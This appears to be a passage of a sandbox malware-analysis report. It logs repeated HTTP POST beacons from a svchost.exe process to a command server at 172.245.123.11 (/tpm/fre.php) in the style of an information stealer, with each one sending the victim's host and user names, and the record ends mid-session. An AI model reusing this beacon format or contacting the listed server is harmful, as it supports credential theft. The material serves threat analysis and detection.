                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              43192.168.2.549821172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:26.418051958 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:26.424355984 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:26.935461998 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:26 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              44192.168.2.549828172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:27.139137030 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:27.144150019 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:27.635956049 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:27 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              45192.168.2.549834172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:27.942557096 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:27.947959900 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:28.470149040 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:28 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              46192.168.2.549839172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:28.633147001 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:28.637968063 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:29.132283926 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:29 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              47192.168.2.549843172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:29.303556919 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:29.308443069 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:29.819360018 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:29 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              48192.168.2.549849172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:30.080763102 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:30.085556984 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:30.594582081 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:30 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              49192.168.2.549854172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:30.763972998 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:30.768827915 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:31.270286083 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:31 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              50192.168.2.549860172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:31.460874081 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:31.465790033 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:31.967292070 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:31 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              51192.168.2.549865172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:32.158081055 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:32.162957907 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:32.650672913 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:32 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              52192.168.2.549872172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:33.120745897 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:33.125642061 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:33.618325949 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:33 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              53192.168.2.549877172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:33.772530079 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:33.779103994 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:34.281630039 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:34 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              54192.168.2.549883172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:34.497632980 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:34.503792048 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:35.002384901 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:34 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              55192.168.2.549889172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:35.147341013 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:35.152173996 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:35.669400930 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:35 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              56192.168.2.549895172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:35.824559927 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:35.829436064 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:36.331146955 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:36 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              57192.168.2.549901172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:36.473862886 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:36.478730917 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:36.981138945 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:36 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              58192.168.2.549907172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:37.130702972 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:37.135566950 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:37.629764080 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:37 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              59192.168.2.549912172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:37.903348923 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:37.908205986 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:38.440361977 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:38 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              60192.168.2.549915172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
                                                              Jan 7, 2025 11:02:38.584865093 CET238OUTPOST /tpm/fre.php HTTP/1.0
                                                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                              Host: 172.245.123.11
                                                              Accept: */*
                                                              Content-Type: application/octet-stream
                                                              Content-Encoding: binary
                                                              Content-Key: D3AFB906
                                                              Content-Length: 153
                                                              Connection: close
                                                              Jan 7, 2025 11:02:38.589708090 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 35 00 33 00 36 00 37 00 32 00 30 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                                                              Data Ascii: (ckav.rualfons536720ALFONS-PC0FDD42EE188E931437F4FBE2C
                                                              Jan 7, 2025 11:02:39.104259968 CET271INHTTP/1.0 404 Not Found
                                                              Date: Tue, 07 Jan 2025 10:02:39 GMT
                                                              Server: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40
                                                              X-Powered-By: PHP/5.6.40
                                                              Status: 404 Not Found
                                                              Content-Length: 23
                                                              Connection: close
                                                              Content-Type: text/html; charset=UTF-8
                                                              Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                              Data Ascii: File not found.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              61192.168.2.549920172.245.123.11806784C:\Windows\SysWOW64\svchost.exe
                                                              TimestampBytes transferredDirectionData
